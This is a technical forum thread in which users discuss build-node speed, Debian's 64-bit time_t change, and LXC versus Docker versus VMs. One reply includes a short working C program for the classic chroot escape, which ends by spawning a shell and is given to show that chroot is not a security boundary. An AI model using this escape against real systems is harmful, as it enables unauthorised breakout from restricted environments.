[#] Mon Feb 12 2024 11:04:44 EST from LoanShark


Now if you sent it up to your CI/CD pipeline, we will probably be in
the next ice age before it finishes. What's with those things anyway?

Each build node tends to be hosted on whatever AWS instance type has sufficient RAM to get the job done, meaning you're only going to have from 2 to 8 hardware threads, typically.

[#] Mon Feb 12 2024 11:05:44 EST from LoanShark


2024-02-02 15:28 from LadySerenaKitty
Recompiling FreeBSD kernel and world only takes a few hours on older
hardware.  Mere minutes on newer stuffs.

I struggle to believe that's accurate if you're talking about a full desktop env including browser etc.

[#] Mon Feb 12 2024 18:09:24 EST from IGnatius T Foobar


Each build node tends to be hosted on whatever AWS instance type has
sufficient RAM to get the job done, meaning you're only going to have
from 2 to 8 hardware threads, typically.

Maybe that's it. All I know is that the pipeline runs at glacial speed no matter what I put into it.

[#] Sat Mar 02 2024 23:15:11 EST from IGnatius T Foobar



Here's something interesting.

[ https://wiki.debian.org/ReleaseGoals/64bit-time ]

Debian is changing `time_t` to 64 bits on all 32-bit architectures except i386.

Seems like they've decided that i386 isn't going to be around in any significant way when the 32-bit time_t rollover happens on 2038-Jan-19. They might be right. It's less than 15 years away. They seem to believe that 32-bit ARM is the one architecture that is likely to still be in somewhat widespread use by then, simply because it's in so many embedded devices.
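For reference, a minimal C sketch of where that date comes from (a signed 32-bit time_t counts seconds since the 1970 epoch and tops out at 2^31 - 1):

```c
#include <stdint.h>
#include <stdio.h>
#include <time.h>

int main(void) {
    /* The largest value a signed 32-bit time_t can hold. */
    time_t last = (time_t)INT32_MAX;       /* 2147483647 seconds */
    printf("%s", asctime(gmtime(&last)));  /* Tue Jan 19 03:14:07 2038 */
    /* One second later, a 32-bit time_t wraps to INT32_MIN and
       lands back in December 1901. */
    return 0;
}
```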

It's an interesting read. They're aware that it's going to cause problems, and they're trying to figure out just how much of a problem and where it will be.

I can tell everyone for certain that Citadel has time_t values embedded in its on-disk database format, so if you're running Citadel on 32-bit ARM you should probably dump your database and reload it on 64-bit before they make the change. If you're running it on 32-bit i386 (like I am...) you have until 2038 to do that.

And hopefully there either won't be a transition to 128-bit computing, or it'll happen long after we're dead. I can't envision a use for an address space wider than 64 bits, but I'm sure they said that about 32 and 16 at one time.

[#] Sun Mar 03 2024 07:08:43 EST from Nurb432


I thought Debian dropped 32-bit support in the last release anyway.

Perhaps I was wrong.

[#] Mon Mar 04 2024 09:27:30 EST from IGnatius T Foobar


Red Hat (and Fedora) and Ubuntu have stopped building i386; SuSE still builds it but doesn't officially support it; Debian still has an i386 build.
However, they don't seem too concerned about i386, expecting it will be well and truly out of service by 2038.

This is more about 32-bit ARM, which is anticipated to continue as a nice way to make embedded systems smaller. Memory savings could be up to 30% in some cases. So they've decided to "break" time_t to keep the architecture alive past 2038.

Interestingly -- someone was forward-thinking enough to make time_t 64 bits when running on 32-bit RISC-V. So that architecture won't have a problem at all.
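If you want to check what a given build gives you, a trivial sketch:

```c
#include <stdio.h>
#include <time.h>

int main(void) {
    /* Prints 64 on fixed platforms (including 32-bit RISC-V with a
       modern libc), 32 on legacy 32-bit builds. */
    printf("time_t here is %zu bits\n", sizeof(time_t) * 8);
    return 0;
}
```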

[#] Tue Mar 05 2024 11:49:04 EST from Nurb432


FreeBSD 13.3-RELEASE is out today... (or at least I just got the notice)



[#] Wed Mar 06 2024 22:19:03 EST from IGnatius T Foobar

Subject: Ok I admit it, LXC doesn't suck



So after all this time I finally decided to give LXC a try. I installed it on kremvax (which is what I named my new microserver) and am playing around with it now. I figure I've got plenty of time to experiment because this machine won't be running production workloads until I get the rest of the hardware in a few months ... particularly the rest of the disk drives and a battery backup.

Under the covers it's obviously using the same kernel primitives as Docker ... cgroups, namespaces, and stuff like that ... but it's designed to run containers that resemble real OS images rather than specific applications. I did something like this in the Ancient Times before I had hardware virt, using OpenVZ (which was how you did it back then). Y'all probably already know this because a lot of you are Proxmox fans, and that has a big LXC thing.
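A minimal sketch of what one of those primitives looks like from C (Linux, needs root; the UTS namespace is the simplest example):

```c
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <unistd.h>

/* Both LXC and Docker build on kernel namespaces. This process gets
   its own UTS namespace, so the hostname change below is invisible
   to the rest of the system. Needs root / CAP_SYS_ADMIN. */
int main(void) {
    if (unshare(CLONE_NEWUTS) == -1) {
        perror("unshare");
        return 1;
    }
    sethostname("demo-container", 14);
    char name[64];
    gethostname(name, sizeof name);
    printf("hostname in here: %s\n", name);  /* demo-container */
    return 0;
}
```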

I'll probably still run KVM on this machine to support FreeBSD and (ugh) Windows once in a while. I did have to remove Docker because it was messing with the iptables configuration. That's going to need some tinkering.

For fun, see if you can ping playground.v6.citadel.org (IPv6 only).

[#] Thu Mar 07 2024 10:24:45 EST from LoanShark



kremvax. I haven't heard that one in a minute.

[#] Thu Mar 07 2024 17:50:59 EST from Nurb432

Subject: Re: Ok I admit it, LXC doesn't suck


At least I'm not alone :)

libvirt has been known to kill my WiFi on a laptop. (Ended up just removing it instead of fixing it... didn't really need it on there, just virt-manager.)

Wed Mar 06 2024 22:19:03 EST from IGnatius T Foobar Subject: Ok I admit it, LXC doesn't suck

I did have to remove Docker because it was messing with the iptables configuration. That's going to need some tinkering.

[#] Fri Mar 08 2024 09:22:23 EST from IGnatius T Foobar


kremvax. I haven't heard that one in a minute.

It's a little nod to those who remember. :)

And I did get Docker running again. The issue was that installing Docker creates a set of iptables rules to support its default networking configuration, and those can't simply be removed. I had no forwarding rules of my own in place yet, so no IPv4 traffic was forwarded to/from my test container. Interestingly, I had plenty of IPv6 because Docker didn't touch the ip6tables forwarding rules.
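For anyone who hits the same thing: Docker flips the IPv4 FORWARD chain's default policy to DROP, and the supported place to add your own exceptions is the DOCKER-USER chain. Something like this (lxcbr0 is illustrative; use whichever bridge your containers hang off):

```
iptables -I DOCKER-USER -i lxcbr0 -j ACCEPT
iptables -I DOCKER-USER -o lxcbr0 -j ACCEPT
```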

I do like that it is trivial to *fully* bridge an LXC container to the host network, to the point where DHCP and SLAAC just work as expected. Docker's bridged networks can't do that.
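The bridged setup is just a few lines in the container config, something like this (LXC 3.x+ key names; br0 being whatever host bridge carries your physical NIC):

```
lxc.net.0.type = veth
lxc.net.0.link = br0
lxc.net.0.flags = up
```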

In the end I'll need both, though. Docker is good at running packaged containerized applications, and when I move my hosting stuff over here I want to run the Docker version of Citadel. I'll probably use LXC for development, experiments, and other homelab-type stuff, and also try to run the VPN router in it.

[#] Fri Mar 08 2024 15:46:31 EST from Nurb432


I still prefer full VMs...

Ya, I'm old school.



[#] Fri Mar 08 2024 19:14:35 EST from zelgomer


2024-03-08 20:46 from Nurb432 <nurb432@uncensored.citadel.org>
I still prefer full VMs...

Ya, I'm old school.


Same. This namespace stuff all feels too loosely coupled; it seems like it would be easy to accidentally allow leaks. I'm not comfortable with the UID mapping gimmick, either. And if I'm not sandboxing for security, then I don't see what it offers that I can't do just as well, and much more simply, with chroot.

[#] Sat Mar 09 2024 13:16:42 EST from IGnatius T Foobar


It depends on why you're building them. Multitenancy still works best with virtual machines. Without multitenancy requirements, most people just want logical separation between their workloads, so you don't, for example, have an application blow up because you upgraded the libraries for some other application on the same machine, or because you have conflicting network ports, or whatever.

That's why containerized applications are so popular. They keep applications from stepping on each other without having to emulate an entire machine.

I am moving back to containers simply to be able to have dev/test/stage/prod in different (emulated) filesystems and on different IP addresses without the overhead of putting VM block devices on top of the host filesystem etc etc etc.

[#] Sun Mar 10 2024 16:08:09 EDT from darknetuser


Same. This namespace stuff all feels too loosely coupled; it seems like it would be easy to accidentally allow leaks. I'm not comfortable with the UID mapping gimmick, either. And if I'm not sandboxing for security, then I don't see what it offers that I can't do just as well, and much more simply, with chroot.

IMO the selling point of stuff like Docker and LXC is not isolation. It is that you can package a clusterfuck application or service as an image and be sure it will run on anything that supports the corresponding container technology.

It also makes disaster recovery easier since the application and its data tend to be decoupled - especially with Docker, not so much with LXC. With Docker, you create a recipe for your application and upload it to a repository, then you have some mechanism for backing up the data from that application. If you need to upgrade the application, you upgrade the recipe in the repository and deploy from it. If your server is destroyed because a pony sneaked into the house and started playing with it, you just re-deploy using the recipe in the repository and the backed-up data from your storage.
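A sketch of what such a recipe looks like, for a hypothetical `myapp` binary (all names illustrative):

```
# The "recipe": build the image once, deploy it anywhere.
FROM debian:bookworm-slim
COPY myapp /usr/local/bin/myapp
# The data lives in a volume, decoupled from the image itself,
# so it can be backed up and restored independently.
VOLUME /var/lib/myapp
CMD ["/usr/local/bin/myapp"]
```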

I don't think containers make much of a difference for a small deployment. Unless you are using some application that comes packaged as an image, you may as well run the stuff on virtual machines, which nowadays are very resource-efficient and don't mess with your namespaces.

By the way, feel free to ask me to post docker spam since they indirectly sponsor me.

[#] Sun Mar 10 2024 17:19:19 EDT from zelgomer


What you guys described, how do namespaces make any of that easier to implement than chroot?

[#] Sun Mar 10 2024 18:11:21 EDT from darknetuser


2024-03-10 17:19 from zelgomer
What you guys described, how do namespaces make any of that easier to
implement than chroot?

For starters, POSIX chroot is escapable by design, and it's incapable of doing anything beyond filesystem separation. You don't get a separate networking space for your application with chroot alone.
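The classic escape is only a few lines of C, as a sketch (assumes root inside the chroot; error handling omitted):

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Why chroot alone isn't a jail: a root process inside it can hop out. */
int main(void) {
    mkdir("hole", 0755);
    int fd = open(".", O_RDONLY);  /* keep a handle on the current root */
    chroot("hole");                /* move the root below us... */
    fchdir(fd);                    /* ...our cwd handle now sits outside it */
    for (int i = 0; i < 64; i++)
        chdir("..");               /* walk up to the real / */
    chroot(".");                   /* make the real / the root again */
    return execl("/bin/sh", "sh", (char *)NULL);
}
```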

Other than that, applications tend to be distributed as Docker images rather than chroot builds, so...

[#] Sun Mar 10 2024 20:00:55 EDT from IGnatius T Foobar


chroot is only part of the picture. cgroups give you other types of isolation, and netns gives you a separate network stack. None of these are intended to be rock-solid "inescapable". They're only there to let you partition your resources in a way that makes sense for the workload.

Like the pony said in less flattering terms, Docker lets you distribute an application and its dependencies in a way that makes it easy to deploy and avoid the "it works on my machine" failure mode. Yes, you could also distribute your application as a virtual machine image, but then you're on the hook for providing operating system updates along with your application, whereas with a container you just keep generating new container builds, often through some automated CI/CD pipeline.

Containers have taken the IT world by storm and, amazingly, there is an open source, industry-wide standard (Kubernetes) for running them at scale in any environment. That's a pretty awesome place to be when you consider how much vendor lock-in has always been the law of the land.

LXC is another story. I am experimenting with it because I (note: *** I ***) intend to run dev, test, stage, prod (or whatever) on the same machine, with loose separation between environments. I don't need multitenancy, I just need each environment to have its own filesystem and its own IP addresses. And so far that's working nicely.

I made /var/lib/lxc a btrfs subvolume and can do nightly thin-snapshots easily. Since it will be a few months before I move production over here, I have some time to muck about with it before I commit to that style of deployment. But so far I like what I have.
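(For the curious: that's just a read-only snapshot each night, something along the lines of `btrfs subvolume snapshot -r /var/lib/lxc /snapshots/lxc-$(date +%F)`, with the /snapshots location being whatever you like.)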

[#] Sat Mar 16 2024 14:20:08 EDT from Nurb432


So, is MINIX development dead at this point?

Been going through my backups (moving files around a bit and getting rid of stuff I really don't need... cleared out over a TB so far) and noticed that my folder for it was pretty old. Went to update... nope, still really old.



[#] Sun Mar 17 2024 17:31:20 EDT from darknetuser


2024-03-16 14:20 from Nurb432
So, is MINIX development dead at this point?

Been going through my backups (moving files around a bit and getting rid of stuff I really don't need... cleared out over a TB so far) and noticed that my folder for it was pretty old. Went to update... nope, still really old.


I think the last RC is from 2017. Wikipedia lists it as abandoned.

https://hackaday.com/2023/06/02/is-minix-dead-and-does-it-matter/
